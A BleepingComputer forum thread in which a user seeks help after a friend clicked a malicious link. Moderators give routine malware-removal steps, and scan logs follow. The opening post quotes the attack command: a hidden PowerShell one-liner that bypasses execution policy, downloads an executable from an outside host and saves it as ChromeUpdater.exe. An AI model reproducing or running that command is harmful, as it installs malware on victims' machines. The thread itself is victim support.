Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Helping an 'infected' Friend


  • Please log in to reply
8 replies to this topic

#1 MarcusMaximus

MarcusMaximus

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:05:00 AM

Posted 25 June 2016 - 02:59 AM

A friend downloaded a file that had a password protected zip file with a link to the password.

 

The link ran the following command. 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.gocataclysm.com/soyotxfbtgoj.exe','%APPDATA%\ChromeUpdater.exe');Start-Process '%AP

I assume that the command downloaded 'soyotxfbtgoj.exe' to the users APPDATA folder and renamed it ChromeUpdater.exe. I don't know what Start-Process '%AP does though.

 

After the user clicked the link chrome crashed and they shutdown and called me. I deleted the ChromeUpdater.exe from the users app data and I'm currently running malware bytes scan and a windows defender scan.

 

Any thoughts on what else I should do and what the  Start-Process '%AP part of the command does. 

 



BC AdBot (Login to Remove)

 


#2 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:12:00 AM

Posted 25 June 2016 - 06:48 AM

Can't  tell you what the adware or malware was attempting to do. Best to scan for both.

After the MBAM scan finishes...please post its log. Use the programs below to scan with.

 

  • When MBAM is finished scanning it will display a screen that displays any malware that it has detected.
  • Click the Remove Selected button.
  • MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so.
  • While still on the Scan tab, click the link for View detailed log, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
  • The log is automatically saved by MBAM and can also be viewed by clicking the History tab and then selecting Application Logs.

POST THE LOG FOR  REVIEW.

 

Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the

Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.

After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.

CCleaner - PC Optimization and Cleaning - Free Download

 

Download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Scan button.
  • When the scan has finished click on Clean button.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the contents of that logfile with your next reply.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
  • download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#3 MarcusMaximus

MarcusMaximus
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:05:00 AM

Posted 25 June 2016 - 10:30 PM

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 25/06/2016
Scan Time: 19:11
Logfile: mwbytes.txt
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2016.06.25.01
Rootkit Database: v2016.05.27.01
License: Premium
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: Dave
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 368726
Time Elapsed: 53 min, 10 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#4 MarcusMaximus

MarcusMaximus
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:05:00 AM

Posted 26 June 2016 - 12:24 AM

# AdwCleaner v5.200 - Logfile created 26/06/2016 at 13:42:43
# Updated 14/06/2016 by ToolsLib
# Database : 2016-06-25.3 [Server]
# Operating system : Windows 10 Home  (X64)
# Username : Dave - HOMEPC
# Running from : C:\Users\Dave\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
[-] File Deleted : C:\Users\Dave\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage
[-] File Deleted : C:\Users\Dave\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage-journal
 
***** [ DLLs ] *****
 
 
***** [ WMI ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\BHO.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\s
 
***** [ Web browsers ] *****
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [1073 bytes] - [26/06/2016 13:42:43]
C:\AdwCleaner\AdwCleaner[S1].txt - [1111 bytes] - [26/06/2016 13:37:38]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1219 bytes] ##########


#5 MarcusMaximus

MarcusMaximus
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:05:00 AM

Posted 26 June 2016 - 03:44 AM

ESET log. 
 
C:\ProgramData\Microsoft\Windows Defender\Scans\FilesStash\DA758AED-73A4-436D-3585-EC1953FF3B17_1d1d0242b05ea80 Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\All Users\Microsoft\Windows Defender\Scans\FilesStash\DA758AED-73A4-436D-3585-EC1953FF3B17_1d1d0242b05ea80 Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Dave\AppData\Local\Downloaded Installations\{9A26B292-9589-445F-9FE3-29C3C5B32EDC}\default.msi a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application
C:\Users\Dave\AppData\Roaming\BitTorrent\updates\7.9.1_31396.exe a variant of Win32/AdkDLLWrapper.A potentially unwanted application
C:\Users\Dave\Desktop\ccsetup519.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Dave\Documents\Programs\BitTorrent.exe a variant of Win32/AdkDLLWrapper.A potentially unwanted application
C:\Users\Dave\Documents\Programs\ccsetup414.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Dave\Documents\Programs\CuteWriter.exe a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application
C:\Users\Dave\Documents\Programs\FileZilla_3.8.0_win32-setup.exe a variant of Win32/InstallCore.AFV potentially unwanted application
C:\Users\Dave\Documents\Programs\PDFCreator-1_2_3_setup.exe Win32/Toolbar.Widgi potentially unwanted application
C:\Users\Dave\Documents\Programs\SetupImgBurn_2.5.8.0.exe Win32/OpenCandy potentially unsafe application
C:\Users\Dave\Documents\Programs\spsetup126.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Dave\Documents\Programs\spsetup128.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Dave\Downloads\ccsetup508.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application


#6 MarcusMaximus

MarcusMaximus
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:05:00 AM

Posted 26 June 2016 - 03:45 AM

Windows 10 won't let JRT.exe run.

I think everything looks OK. 



#7 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:12:00 AM

Posted 26 June 2016 - 05:48 AM

JRT runs on Windows 10....likely some security program blocking it. But if you think everything is OK....I accept that. 

Happy surfin'....


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#8 MrRobot

MrRobot

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:07:00 AM

Posted 27 June 2016 - 03:59 AM

Hello I'm the owner of that file sharing service, you got that zip file from 4chan since it got spread over there. After getting online ive removed everything malware related even the zip files and exe files. Im sorry that your friend got infected with it. Ive also got some backup from the zip file and a malwr scan on the .exe file that it downloaded (maybe not exactly that one but there were many of them doing the same stuff) If needed i can provide them



#9 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:12:00 AM

Posted 27 June 2016 - 07:42 AM

Thanks for posting that. fourchan...the infamous non-moderated...everything goes...and does website. But really....hard to imagine

someone falling for one "prank" started there. The one that said you could charge your iphone by zapping in a microwave. Seems many did, though.


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users